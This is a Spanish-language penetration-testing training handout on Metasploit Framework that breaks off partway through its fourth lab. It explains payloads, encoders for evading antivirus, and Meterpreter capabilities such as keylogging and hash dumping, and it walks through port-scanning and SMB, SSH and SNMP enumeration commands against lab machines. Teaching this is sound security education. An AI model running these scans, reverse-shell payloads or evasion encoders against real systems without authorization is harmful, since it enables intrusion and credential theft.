SlideShare a Scribd company logo
1 of 42
Download to read offline
Certified Offensive and Defensive Security Professional -CODSP Training




          Certified Offensive and Defensive Security
                 Professional -CODSP Training
          (Profesional Certificado en Seguridad Ofensiva y Defensiva)




                                   Taller de entrenamiento:
            Penetration Testing con Metasploit
                    Framework v 1.0




                                    © www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training




      Fundamentos y conceptos básicos de Explotación y el software Metasploit.
                               ásicos

      Seguramente muchas personas han escuchado hablar a un amigo, colega, un conferencista, un
      docente, entre otros, sobre los Frameworks de explotación de vulnerabilidades, y en especial
      del famoso Framework de explotación llamado Metasploit, y muy seguramente ha entrado
      algún nivel de curiosidad en lo que respecta al funcionamiento, alcance e impacto que tiene
      este entorno de trabajo en la seguridad de la información ofensiva.

      En efecto proyectos como Metasploit han revolucionado la forma en que se realizan las
                                   Metasploit
      auditorías, Test de Penetración y/o pruebas de seguridad a los sistemas de información, ya
      que su potencia es tal, que personal técnico en el área de las tecnologías de la información sin
      experiencia en seguridad de la información y/o usuarios mal intencionados pueden hacer uso
      de Metasploit para realizar pruebas de seguridad de una forma sencilla y causar según el
      usuario, un buen dolor de cabeza a los administradores de sistemas o por el contrario,
      presentar importantes alertas de seguridad de forma anticipada, para corregir los agujeros y
         esentar
      debilidades de seguridad de un sistema informático. Sin embargo software como Metasploit
      tiene más positivo que negativo, ya que tener un entorno de trabajo con expl
                                                                                 exploits actualizados
      y listos para ejecutarse, obligan a las empresas desarrolladoras de software a programar y
      publicar los parches para los agujeros de seguridad que son aprovechados por los diferentes
      marcos de explotación que existen en el mercado. Como es el caso de Metasploit.
                                                               es

      La potencia de Metasploit radica en tre conceptos fundamentales: Facilidad de uso,
                                          tres
      multiplataforma y la comunidad.

      Facilidad de uso: desde el usuario inexperto y novato en las pruebas de seguridad a sistemas
      de información, hasta el usuario experto que tiene las capacidades de crear códigos de
                           a
      explotación, puede hacer uso de todo el potencial de Metasploit como parte esencial de las
      herramientas que usan para la realización de las pruebas de seguridad a los sistemas
      informáticos.

      Multiplataforma: Otra razón de peso para aprovechar todo el potencial de Metasploit, es que
                       :
      puede ser usado en diferentes sistemas operativos como Linux, Windows, Unix, entre otros,
      sin perder en ningún momento la potencia del software Metasploit, independiente del sistema
                                                                        independiente
      operativo que usa el usuario final.

      La comunidad: Metasploit fue liderado por un experto Hacker llamado HD Moore en el año
      2003, sin embargo con el pasar de los años, muchos expertos en desarrollo de códigos de
      explotación se han sumado a este gran proyecto, con lo que miles de programadores del
                               do
      mundo en la actualidad programan códigos de explotación de vulnerabilidades y los integran a
      Metasploit, ayudando así a que la base de datos de exploit en Metasploit, sea de las más
      completas en el mundo, y se mantenga bien actualizada.
                  n

      Para comenzar de forma adecuada el estudio, análisis y práctica con el software de explotación
      Metasploit, es importante conocer la estructura de Metasploit y algunos conceptos base
      relacionados con la explotación de vulnerabilidades.
                                   ón



                                     © www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training




      Metasploit: En su versión Framework, Metasploit es un software de explotación amparado
      como Software Libre y código abierto, inicialmente escrito en el lenguaje de programación
      Perl, pero actualmente está escrito en el lenguaje de programación Ruby. A la fecha fue
                                                           e
      adquirido por la potente empresa de seguridad llamada Rapid7, y recibe un gran número de
      solicitud de descargas de forma anual.

      Vulnerabilidad: Es una debilidad que existe en un sistema operativo, aplicación, dispositiv
                                                                                       dispositivos
      de red, protocolos de red, entre otros, la cual permite a un atacante o auditor de seguridad
      comprometer la seguridad del sistema o dispositivo de red.

      Exploit: Es un código, método o vía, que permite a un atacante informático o a un auditor de
             :
      seguridad explotar una vulnerabilidad conocida, para poder comprometer la seguridad de un
            dad
      sistema informático. A modo informático, Metasploit cuenta con más de 700 códigos de
      explotación.

      Payload: Es un código que acompaña y se ejecuta después del código de exp   explotación, con el
      objetivo de poder realmente hacer algo en el sistema de la víctima, por lo regular el código
                                                                            ,
      Payload se usa para realizar una conexión entre el atacante y la victima. Algunos ejemplos de
      un Payload, seria la conexión a la victima por medio de una Shell de comandos como cmd.exe
      por ejemplo, o conectarse a la victima usando el protocolo VNC. A modo informático,
      Metasploit cuenta con más de 250 códigos del tipo Payload.

      Encoder: Es un componente de metasploit, el cual se usa para generar versiones trasformadas
                                                                           versiones
      de Payloads.

      Módulos: Los módulos son pequeños componentes del sistema, donde cada modulo realiza
      una tarea específica, la cual puede ser llamada en algún momento para integrarse a otros
                          ,
      módulo, y poder hacer así una tarea más representativa de forma completa y compuesta por
                                                       tativa
      varios módulos.

      ShellCode: El shellcode se define como un conjunto de instrucciones que son utilizadas por un
      Payload cuando el proceso de explotación se ejecuta. Por lo regular en Shellcode está escrito
      en lenguaje Ensamblador (Assembly). En la mayoría luego de que se ejecute el código
                je
      Shellcode se recibe al usuario atacante y/o auditor de seguridad una Shell de comandos.

      Listener: Un listener es un componente del software Metasploit, el cual queda a la espera de
      algún tipo de conexión entrante. Un ejemplo de un listener seria cuando una maquina victima
      ha sido comprometida y se ha dejado algún tipo de puerta trasera o servicio ejecutándose en
      la maquina víctima, y dicho servicio hace llamados de conexión a la maq maquina atacante de
      forma periódica para poder lograr de nuevo una intrusión en el equipo víctima.

      Auxiliar (Auxiliary): Es un modulo de Metasploit Framework, el cual permite hacer tareas
      adicionales, para resolver problemas específicos, tales como el scanning de puertos, ataques
                                                                            ng
      por fuerza bruta, entre otros.

      Arquitectura de Metasploit: La arquitectura modular del software Metasploit, puede verse en
                                :
      la siguiente gráfica.
                                     © www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training




      Fuente: http://www.offensive
              http://www.offensive-security.com/metasploit-unleashed/Metasploit_Architecture
                                                           unleashed/Metasploit_Architecture

      Analizando un poco el diagrama anterior, se tiene lo siguiente:

      Libraries (Librerías): Las diferentes librerías son usadas de forma clave para el adecuado
      funcionamiento de Metasploit, ya que estas son una agrupación de tareas definidas,
      operaciones y funciones que pueden ser usados por los diversos módulos que componen
      Metasploit. Una de las Libreríasmás importantes en el Framework de explotaci Metasploit
                                                                                 explotación
      es la Librería Rex, la cual es la base para la mayoría de tareas, ya que dentro de esta librería se
      encuentran componentes de gran importancia como las implementaciones de los protocolos a
      nivel de servidor y cliente.

      Luego se tiene la Librería "MSF Corelibrary", esta librería tiene como funciona principal la
      implementación de todas las internases requeridas, las cuales permiten el trabajo de forma
      conjunta con los módulos de explotación, las sesiones, entre otros.

      Finalmente se encuentra la Librería "Base library", la cual es la encargada de soportar el
                                  a
      trabajo con los diferentes tipos de interfaces a nivel de usuario.

      Interfaces: El entorno de trabajo de Metasploit, ofrece diferentes tipos de interfaces, cada una
      de ellas con sus fortalezas y debilidades. Las interfaces son las siguientes:
                              zas

      Msfconsole: Es una de la partes más populares y reconocidas de Metasploit Framework, ya
      que es una herramienta del "tipo todo en uno", es una herramienta llena de funcionalidades,
      en la cual se puede hacer todo tipo de procesos en el Framework, tales como la carga de
                              acer
      módulos auxiliares, el scanning de una red, procesos de enumeración, creación de listeners y el
      lanzamiento de un exploit. Es una de las interfaces que mayor apoyo y soporte tiene con el
      entorno de trabajo de Metasploit. Para ingresar a la interface msfconsle, simplemente basta
         torno


                                      © www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training




      con abrir una shell de comandos y digitar el comando msfconsole, tal y como se aprecia en la
                                                                     ,
      siguiente imagen.




      Luego debe de abrirse la interface msfconsole, tal y como se aprecia en la siguiente imagen.




      Al principio la interface puede parecer un poco compleja, pero a medida que el usuario va
      conociendo los diferentes comandos, se podrá apreciar la facilidad de trabajo bajo la interfaces
      msfconsole. Para usar la ayuda dentro de la interface msfconsole, se debe de digitar el
                                a
      siguiente comando: msfconsole -h




      Un listado completo de los comandos soportados por la consola msfconsole, puede ser
      consultado en la siguiente URL:

      http://www.offensive-security.com/metasploit unleashed/Msfconsole_Commands
                           security.com/metasploit-unleashed/Msfconsole_Commands


      Msfcli: Es una consola que se ejecuta directamente desde la línea de comandos (Shell). A
      diferencia de msfconsole, msfscli es una consola más limitada, en la cual de igual forma se
                                            una
      pueden lanzar exploits, configurar módulos auxiliares, entre otros. A pesar de que su uso es
      limitado frente a msfconsole, msfcli es una interface de gran utilidad para ejecutar tareas tales
      como: probar nuevos exploits, realizar explotación específica cuando el usuario conoce el
                   r
                                     © www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training




      exploit y las opciones, automatización básica y con scripts, además es adecuado para el
      aprendizaje de Metasploit
      Es importante tener presente que msfcli, solo puede manejar una shell o un hilo de conexión a
      la vez. En la siguiente imagen se podrá ver un ejemplo de uso de msfcli.




      Msfweb: Es una consola web de fácil uso, del tipo apunte y tire o "Point     "Point-and-click".
      Relativamente ha sido considerada como una consola inestable y de poco uso. Para este
      modulo del di lomado en seguridad, no se hará uso de este tipo de interface.

      Armitage: Es una interface grafica a nivel de usuario, creada por Raphael Mudge, la cual posee
      muchas características y se integra con Metasploit de forma gratuita. Para este modulo el
      diplomado y/o taller de seguridad no se hará mucho énfasis en Armitage, pero vale la pena
      que el estudiante luego profundice en esta interface, teniendo presente de forma anticipada el
      buen manejo de la consola msfconsole, y que esté familiarizado con Metasploit Framework. En
      el siguiente link se encuentra un interesante curso de puesta en marcha y pruebas con
      Armitage. http://www.ethicalhacker.net/content/view/379/2/
      En la siguiente imagen se puede observar la interface Armi
                                                             Armitage.




                                     © www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training




      Nota: Para los módulos de explotación y post explotación de este curso de seguridad, vamos a
                                              post-explotación
      basarnos principalmente y en un gran porcentaje en la interface msfconsole.

      Metasploit Utilities (Utilidades Importantes de Metasploit): Las siguientes u
                                                                                  utilidades pueden
      sernos de mucha ayuda en situaciones específicas que en algún momento se nos presenten al
      momento que estemos realizando nuestras auditorías de sistemas, y tests de seguridad del
      tipo Hacking Ético.

      MsfPayload: Es una utilidad de Metasploit que le permite al usuario final tareas de gran
                                       Metasploit
      importancia tales como: Generar códigos del tipo shellcode, generar archivos ejecutables, para
      pruebas de infecciones de virustroyanos por ejemplo. Con los las prácticas de laboratorio
      vistas en el transcurso de este diplomado, veremos que la utilidad msfpayload es de gran
                        curso
      ayuda para los procesos de explotación del lado cliente (ClientSide).

      MsfEncode: Los códigos del tipo “Shell code” generados pro msfpayload son totalmente
      funcionales, sin embargo muchos de estos códigos contienen caracteres nulos, los cuales al ser
                               muchos
      interpretados por muchos programas, pueden causar que el código no se ejecute de forma
      completa. Además de que los Shellcode generados muy probablemente lleguen a la victima
      pasando por redes que estén siendo vigiladas y protegidas por sistemas detectores de intrusos
                       es
      y software antivirus. Por todas las razones expuestas anteriormente los desarrolladores de
      Metasploit crearon Msfencode, el cual es una utilidad que ayuda a evitar que el shelshellcode
      preparada por el auditor informático y/o Pentester, sea indetectable y no contenga caracteres
      que afecten la ejecución del código antes de tiempo. Metasploit contiene diferentes encoders
      (Codificador) para diversas situaciones. Para identificar la lista de opciones de la utilidad
                                                                   lista
      msfencode, se debe de digitar el comando que se aprecia en la siguiente imagen:




      Uno de los encoders más fiables que contiene Mestaploit, es el encoderx86/shikata_ga_nai, el
      cual está clasificado como Excelente (Excellent). Para ver un listado de los encoders
      disponibles, digitar el siguiente comando desde la Shell de Linux Backtrack: msfencode -l




                                    © www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training




      Clasificación de los Exploit y los Payloads en Metasploit Framework:

      Clasificación de los Exploit: Los códigos de explotación (Exploits) en Metasploit se dividen en
                                                   explotación
      dos: Exploit Activos y Exploits Pasivos

      Exploit Activos: Son códigos de explotación que se ejecuten en la maquina victima de forma
      completa, incluyendo la finalización del código. Algunos ejemplos de exploits act
                                                                                    activos son:

      ms08_067_netapi
      smb/psexec

      Exploit Pasivos: Son códigos de explotación que esperan a que las victimas se conecten a ellos.
      Por lo regular son los códigos exploits que están del lado del cliente (ClienSide).

      Clasificación de Payloads: Los códigos del tipo Payload (Carga Útil) en Metasploit dividen en
                                        códigos
      tres: Singles, Stagers, y Stages.Cada uno de ellos posee una gran variedad y pueden aplicarse a
      diferentes escenarios.

      Singles: Son tipos de Payloads que son autónomos e independientes, y se ven rep   representados
      en acciones como crear un usuario o abrir la calculadora (calc.exe) en el sistema víctima.

      Stagers: Son tipos de Payloads diseñados de un modo pequeño y fiables y permiten configurar
      una conexión de red entre la víctima y el atacante.

      Stages: Son tipos de Payloads un poco más pesados, y permiten descargar y hacer procesos en
      el sistema víctima tales como Inyección VNC, Meterpreter, entre otros.

      Meterpreter (Meta- Interpreter) “Todo en Uno” – El Payload Rey.


                                     © www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training




      Como se verá a lo largo de este curso de seguridad, Metasploit Framework tiene muchos
                                       curso
      Payloads, pero meterpreter es uno de los que más funcionalidades tiene. Meterpreter se
                                                                             .
      define como una extensión de Metasploit, la cual permite aprovechar al máximo las
      funcionalidades de Metasploit y aumentar el alcance en lo que respecta a comprometer a
                                      aumentar
      nuestra maquina víctima. También puede definirse como un Payload avanzado.
                             .
      Dentro de muchas de las funcionalidades y características que nos ofrece Meterpreter se
      encuentran:

          •   Cargar Un Keylogger(Módulo que graba las pulsaciones en el teclado) en el sistema
                          Keylogger(Módulo
              victima
          •   La comunicación entre el atacante (Auditor) victima (objetivo de evaluación) es cifrada
          •   Hacer capturas de pantalla(Screenshot) en el sistema victima
          •   Subir y descargar archivos entre el siste
                                                   sistema víctima y el atacante y/o auditor.
          •   Apagar el sistema victima
          •   Manipular el registro de Windows en el sistema victima (Acceso Lectura/Escritura)
          •   Abrir una Shell de comandos en el sistema victima
          •   Migrar de procesos en el sistema victima
          •   Obtener los Hash de los usuarios del sistema victima
                                  e
          •   Pivoting entre subredes en el sistema y/o red victima
          •   Evita la creación de procesos en el sistema victima
          •   Evita la creación de archivos en el disco duro del sistema victima
          •   Es una herramienta que sirve tanto en el proceso de explotación, como en el de postpost-
              explotación.
          •   Se pueden usar múltiples canales de comunicación entre la víctima y el atacante
              (Auditor) usando la misma conexión.
          •   Acceso al sistema de archivos en el sistema victima
          •   Ejecución de comandos en el sistema vic victima
          •   Obtener información del sistema victima
          •   Es un Payload estable y altamente flexible
          •   Deshabilitar el software antivirus
          •   Capturar trafico de red en el sistema victima
          •   Y Mucho mas……………………

      En la siguiente imagen podemos apreciar una Shell Meterpreter que se le ha dado al usuario
      atacante y/o auditor de seguridad, luego de que este ha realizado una intrusión exitosa sobre
      un sistema vulnerable con S.O Windows XP.




                                     © www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training




      Para usar la ayuda de meterpreter, basta con digitar el comando help directamente des la
                                                                                        desde
      consola meterpreter.

      A medida que avanza el curso de seguridad, veremos cómo utilizar Meterpreter en los
      procesos de auditorías de seguridad y teste de penetración. Meterpreter será una de las
      herramientas que más se usa en los procesos de explotación de este curso de seguridad
                                                       explotación
      informática.

      Otros Payloads importantes que se deben manejar y conocer dentro del entorno de trabajo de
      Metasploit Framework:

      windows/vncinject/reverse_tcp
      windows/shell/reverse_tcp
      windows/shell_bind_tcp

      Explotación básica con Metasploit Framework Para proceder a realizar el primer proceso de
                                        Framework:
      explotación usando metasploit Framework, se hace necesario tener presente los siguientes
      conceptos y criterios:

          •   La explotación y la post explotación son las últimas fases de proceso de auditoría de
                                  post-explotación
              seguridad ética (Hacking ético) y/o Test de penetración, por lo que antes de proceder
              al lanzar el primer proceso de explotación con Metasploit, el estudiante debe de
              manejar de forma completa las anteriores fases del Hacking Ético tales co       como:
              Recolección de información, Scanning de puertos, Enumeración y Scanning de
              vulnerabilidades.

          •   El proceso de explotación, se basa en una debilidad crítica identificada en las fases
              anteriores del Hacking Ético.

          •   La mayoría de procesos de explotación se realizan usando la consola msfconsole, sin
              embargo haremos uso en algunos procesos de explotación de la consola msfcli.

          •   Para lanzar el primer exploit usando Metasploit Framework, se deben de tener en
              cuenta los conceptos que se mencionan a continuación, en lo que respecta a
                                                                        en
              explotación básica.

          •   Tener en cuenta y como referencia los comandos de msfconsole, los cuales se pueden
              encontrar de forma completa en la siguiente Url: http://www.offensive
                                                                         http://www.offensive-
              security.com/metasploit-unleashed/Msfconsole_Commands
              security.com/metasploit


      Conceptos de explotación básica con Metasploit Framework: teniendo presente que
      metasploit contiene muchísimos módulos, exploit, auxiliares, payloads, entre otros, se dific
                                                                                             dificulta
      un poco recordar cada uno de los módulos, por lo tanto es importante conocer y practicar
      sobre los siguientes comandos de la consola msfconsole, para facilitar así el uso de cada uno
      de los componentes que requeridos para los procesos de explotación:

                                     © www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training




      msf> show exploits: Este comando muestra todos los códigos de explotación que están
      disponibles en metasploit Framework (La cantidad de exploits depende de la fecha de
      actualización de metasploit). El anterior comando es de gran importancia, ya que cada d se
                                                                                            día
      descubren nuevas vulnerabilidades, y por consenciente se crean e integran nuevos códigos de
      explotación a metasploit framework. En la siguiente imagen se puede apreciar un ejemplo de
      la ejecución de este comando.




      msf> show auxiliary: Los módulos auxiliares en metasploit, tienen variedad de propósitos,
      tales como: Scanners de red, Scanners de servicios, fuzzers, entre otros. Por lo tanto la
      ejecución del comando en mención muestra en pantalla los módulos auxiliares disponibles
      para metasploit framework. (La cantidad de módulos auxiliares depende de la fecha de
                             work.
      actualización de metasploit)


      Prácticas de Laboratorio:

      Práctica de laboratorio numero 1
      Objetivos: Ingresar y hacer uso de las diferentes consolas que ofrece Metasploit, tales como
                :
      la msfconsole y la msfcli.
      Recursos: VMWARE, Metasploit Framework y Backtrack 5
               :


      Ejecución de la práctica de laboratorio 1:

      Paso 1: Ingresar a Linux Backtrack, y abrir una shell de comandos (Terminal). (Recordar que el
            :
      usuario y passqord respectivamente para Backtrack, es root y toor. Luego desde la shell de
                                             para
      comandos digitar startx para entrar al modo grafico)



                                     © www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training




      Paso 2: abrir la consola msfconsole, lo cual se logra digitando el comando msfconsole desde la
      terminal de comandos de Linux Backtrack




      Luego que se digite el comando msfconsole, debe de salir lo siguiente:




      En la anterior imagen se puede apreciar que ya estamos dentro de la interface msfconsole. En
      el ingreso a la interface, el sistema nos indica la versión de metasploit, el número de exploi
                                                                                              exploits,
      el número de módulos auxiliares, el número de PAYLOADS, entre otros.

      Anotación: Para ingresar a la interface msfconsole, y a las otras interfaces que nos ofrece
      metasploit, también lo podemos hacer por el entorno grafico.




                                     © www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training




      Paso 3: digitar el comando msfconsole -h, para poder ver la ayuda de la interface msfconsole




      Paso 4: salir de la interface msfconsole con el comando exit.

      Paso 5: Una vez que se tiene una visión general sobre algunas de las interfaces de metasploit,
      es importante tener presen que el software debe de quedar actualizado a los últimos
                            presente
      exploits, payloads, módulos auxiliares, entre otros. Para actualizar metasploit, simplemente
      desde una shell de msfconsole digitamos el comando msfupdate.
                         msfconsole,




      O también puede hacerse de la interface grafica, tal y como se muestra en la siguiente
                                    interface
      imagen.



                                     © www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training




      Anotación: Para efectos de este taller, ya se entrega Linux Backtrack con Metasploit
                :
      actualizado al día. Lo anterior para fines de optimizar tiempos, ya que actualizar metasploit en
      el equipo e cada estudiante, puede tomar algún tiempo, según la velocidad del canal de
      Internet en donde se dicta el taller.

      Es altamente importante, que cuando actualicen metasploit en sus casas, configuren el
      bloqueador de scripts de firefox en sitio https://metasploit.com, como un sitio seguro, para
                                                https://metasploit.com,
      que no presenten problemas al momento de actualizar metasploit.




      Práctica de laboratorio numero 2
      Objetivos: Verificar la conexión de Metasploit con un sistema de bases de daos, para ir
      almacenando la información de los host que se están evaluando a nivel de seguridad, en lo
      que respecta a procesos de scanning de puertos.
                                     © www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training




      Recursos: VMWARE, Metasploit Framework, Windows Server y Backtrack 5
              :

      Observaciones:
             Antes de proceder a realizar la práctica, verificar que las maquinas Linux Backtrack y
             Windows 2003 Server están conectados en el mismo segmento de red, y que hay ping
             entre ambas maquinas.
             Es altamente importante tener conocimientos básicos medios al respecto de los
                                                                 básicos-medios
             servicios de red que se están evaluando y próximamente atacando, para comprender
                                                         próximamente
             mejor el trabajo de análisis de seguridad y/o penetration testing realizado.


      Ejecución de la práctica de laboratorio 2:

      Conexión con una base de datos y Scanning de Puertos

      Paso 1: Ingresar a la interface msfconsole
            :

      Anotación: En versiones anteriores de metasploit se hacía necesario configurar metasploit
      con una base de datos para poder plasmar de una manera más ordenada los resultados de las
      actividades que se iban ejecutando en el proceso de pruebas de penetración. Actualmente la
                                                                     penetración.
      última versión de metasploit solo soporta conexión para base PostgreSQL. Para poder ver el
      status de conexión de metasploit con la base de datos PostgreSQL se debe de digitar el
      siguiente comando: db_status




      Paso 2: digitar el comando db_status, para identificar que metasploit esté conectado a una
      base de datos llamada msf3dev
                                dev

      Paso 3: digitar el comando db_nmap dirección IP Target (Windows Server 2003)
            :




      Paso 4: digitar el comando hosts para ver los resultados de los host que se tienen guardados
      en la base de datos. Para el siguiente caso, se tienen dos host.




                                     © www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training




      Anotación: En ocasiones cuando el equipo de trabajo de un proceso de auditoría de seguridad
      y/o penetration testing es representativo, y se hacen pruebas en diferentes momentos y de
      lugares distintos, es importante ejecutar nmap de firma directa y guardar los resultados en un
                       ,
      archivo con algún formato en especial, por ejemplo en XML.

      Paso 5: realizar un scanning de puertos usando nmap, con la opción de exportar los resul
             :                                                                            resultados
      del scanning a un archivo del tipo XML. El scanning de puertos se puede hacer a un solo host, o
      directamente a toda una subred. Para el caso hacerlo sobre la maquina Windows 2003 Server.




      Los resultados del anterior proceso de scanning, deberían de ser importados a la base de datos
      de metasploit.

      Paso 6: Una vez que se tienen algunos host registrados en la base de datos, con el comando
             :
      services, se pueden identificar los servicios que están a la escucha en las maquinas victimas.
               ,




                                     © www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training




      Paso 7: realizar un proceso de Scanning de puertos usando los modulos auxiliares de nmap que
                   zar
      están dentro de metasploit. Para lograrlo primero debemos de hacer una búsqueda con el
                                                                              na
      comando search de los módulos auxiliares de metasploit que tiene la función de scanning de
      puertos, lo cual e logra con el siguiente comando: search portscan




      Luego se obtiene los siguientes resultados:




                                     © www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training




      Paso 8: Seleccionar el modulo auxiliar de scanning llamado auxiliary/scanner/portscan/syn y
      seleccionarlo con el comando use de metasploit, tal y como se muestra en el siguiente
      comando: use auxiliary/scanner/portscan/syn




      Dar el comando show options para ver las variables que necesita el modulo para poder
      trabajar.




      Paso 9: Indicar las variables que se necesita para realizar el scanning de puertos, para el caso
             :                                                       scanning
      solo vamos a asignar valores a la variable RHOST que es la maquina target victima, a la cual el
                                                                            target-victima,
      vamos a realizar el scanning de puertos, y vamos a asignarle valores a la variable PORTS, que
      corresponde a los puertos TCP que vamos a verificar si están abiertos, cerrados o filtrados.
      Según lo anterior los comandos para asignar los valores para ambas variables son:

      set RHOST IP de Windows Server
      set PORTS 25,53,80,110,135,139,445,1433,3389

      Paso 9: El último paso es digitar e comando show options para ver que todo está bien, y si no
            :                           el
      hay problemas, entonces de procede a ejecutar el modulo Auxiliar de scanning de puertos con
                      ,
      el comando run




                                     © www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training




      Una vez que se ejecute el modulo auxiliar contra uno de los targets (Objetivos de evaluación),
                                                            e
      debe de salir los siguientes resultados (Recordar que las direcciones IP varían de acuerdo a
      cada target de cada segmento de red de las maquinas virtuales)




      Ir más allá: Para usuarios más avanzados y/o experimentados con metasploit, que tal si
      ejecutan el anterior comando, pero colocando un sniffer como wireshark de forma paralela al
      scanning de puertos, para capturar el tráfico y verificar el tráfico de red para un scanning de
      puertos del tipo SYN.


      Práctica de laboratorio numero 3
      Objetivos: Identificar y utilizar algunos de los módulos auxiliares que tiene M
                                                                                    Metasploit para
      realizar procesos de scanning de puertos para aplicaciones y/o protocolos específicos tanto a
                                                                                 específicos,
      nivel TCP como para UDP.

      Recursos: VMWARE, Metasploit Framework, Windows Server 2003, Windows XP y Backtrack
                                                                 ,
      5

      Observaciones:
             Antes de proceder a realizar la práctica, verificar que las maquinas Linux Backtrack y
             Windows 2003 Server están conectados en el mismo segmento de red, y que hay ping
             entre ambas maquinas.
             Es altamente importante tener conocimientos básicos-medios al respecto de los
                         te                                              medios
             servicios de red que se están evaluando y próximamente atacando, para comprender
             mejor el trabajo de análisis de seguridad y/o penetration testing realizado.


      Ejecución de la práctica de laboratorio 3:

      Paso 1: Trabajando con el Protocolo SMB: Realizar un proceso de scanning del servicio SMB
      (Server Message Block Scanning), para lo cual se debe de seleccionar el modulo auxiliar
      auxiliary/scanner/smb/smb_version Para poder usar este modulo, se debe realizar de forma
      auxiliary/scanner/smb/smb_version.                            o,
      secuencial lo siguiente:
                                     © www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training




              seleccionar       el      modulo     auxiliar      con      el      comando         use
              auxiliary/scanner/smb/smb_version
              Luego se debe de digitar el comando show options, para ver las opciones del modulo
                                                                  ,
              auxiliar
              Luego se le coloca la variable RHOSTS, que para el caso de este laboratorio, seria para
                                     variable
              asignar la dirección IP de Windows 2003 Server.
              De nuevo digitamos show options y si todo está bien, ejecutamos el módulos auxiliar
              con el comando exploit.

      En la siguiente imagen encuentras de forma secuencial todos los pasos mencionados
      anteriormente.




              Si el exploit se ejecuta correctamente, deberá de mostrar algo similar a la siguiente
              imagen, donde se puede apreciar el sistema operativo del target (Victima -objetivo de
              análisis de seguridad), el dominio al que está asociado la víctima, y el nombre del
                                   d),                                           ,
              servidor




                                     © www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training




      Paso 2: Trabajando con el Protocolo SMB: Realizar un proceso de enumeración de usuarios y
      grupos del nuestra víctima o target, que para el caso es Windows 2003 Serve lo cual se logra
                                                                            Server,
      usando el modulo auxiliar auxiliary/scanner/smb/smb_lookupsid
                                auxiliary/scanner/smb/smb_lookupsid.

      Para poder usar este modulo, se debe realizar de forma secuencial lo siguiente:

              use auxiliary/scanner/smb/smb_lookupsid
              show options
              set RHOSTS IP Windows Server
              exploit

      En la siguiente imagen encuentras de forma secuencial todos los pasos mencionados
                  nte
      anteriormente.




              Si el modulo auxiliar se ejecuta de forma correcta, deberemos tener los nombres de
              usuarios y grupos que existen actualmente en el servidor Windows 2003 Server.




                                     © www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training




      Paso 3: Trabajando con el Protocolo SSH: Realizar un proceso de identificación de la versión
      del servidor SSH que se encuentra en el equipo Windows XP SP2 Lo anterior se logra
                                                                         SP2.
      seleccionando el modulo auxiliar de metasploit llamado auxiliary/scanner/ssh/ssh
                                                             auxiliary/scanner/ssh/ssh_version

      Para poder usar este modulo, se debe realizar de forma secuencial lo siguiente:

              use auxiliary/scanner/ssh/ssh_version
              show options
              set RHOSTS IP Windows XP SP2
              exploit

      En la siguiente imagen encuentras de forma secuencial todos los pasos mencio
                                                                            mencionados
      anteriormente.




      Paso 4: Trabajando con el Protocolo SNMP: Realizar un proceso de identificación de recursos
      que se tengan compartidos en la estación de trabajo Windows XP SP2, usando el protocolo
      simple de administración de red. Lo anterior se logra seleccionando el modulo auxiliar de
                                                      logra
      metasploit llamado use auxiliary/scanner/snmp/snmp_enumshares

              use auxiliary/scanner/snmp/snmp_enumshares
              show options
              set RHOSTS 192.168.137.28
              run

                                     © www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training




      En la siguiente imagen encuentras de forma secuencial todos los pasos mencionados
      anteriormente.




      Anotación: Y de forma similar existen muchísimos más módulos auxiliares a nivel de scanners
      de puertos y aplicaciones, los cuales evalúan otros protocolos tales como FTP, MSSQL, SNMP,
      entre otros.




      Práctica de laboratorio numero 4
      Objetivos: Identificar y utilizar algunos de los módulos auxiliares que tiene Metasploit para
                 :
      realizar procesos de análisis de vulnerabilidades para aplicaciones y/o protocolos específicos,
      tanto a nivel TCP como para U  UDP.

      Recursos: VMWARE, Metasploit Framework, Windows Server 2003, Windows XP y Backtrack
      5

      Observaciones:
             Antes de proceder a realizar la práctica, verificar que las maquinas Linux Backtrack y
             Windows 2003 Server están conectados en el mismo segmento de red, y que hay ping
                                                                              de
             entre ambas maquinas.
             Es altamente importante tener conocimientos básicos medios al respecto de los
                                                                 básicos-medios
                                     © www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training




              servicios de red que se están evaluando y próximamente atacando, para comprender
              mejor el trabajo de análisis de seguridad y/o penetration testing realizado.
                                                            penetration
              Como actividad complementaria y para evitar todo el tiempo que la aplicación nessus
              se demora actualizando los plug in, se puede usar el software nessus que esta
                                              plug-in,
              instalado en la maquina Windows XP


      Anotación: Es altamente recomendable que si el estudiante no conoce como trabaja MSSQL
                                recomendable
      Server, lo investigue por cuenta propia con el fin de mejorar los conocimientos relacionados
      con auditorias de sistemas intrusivas del tipo Penetration Testing, ya que durante la siguiente
      practica de laboratorio, va a comprometer a SQL Server, en lo que respecta a violentar la
      seguridad del motor de bases de datos, y del sistema operativo que lo contiene..

      Ejecución de la práctica de laboratorio 4:

      Paso 1: Scanning de Puertos y version del puerto T 1433: Si se tiene en cuenta los procesos
                                                       TCP
      de scanning de puertos realizados en laboratorios pasados, se puede observar que el puerto
      1433 TCP está en estado Listening (Abierto), esperando conexiones, además si se realiza un
                           tado
      proceso de scanning de puertos a este puerto en especial con la opción -sV de nmap, se puede
                                                                              sV
      apreciar que el servicio y versión que están detrás de ese puerto, son Microsoft SQl Server
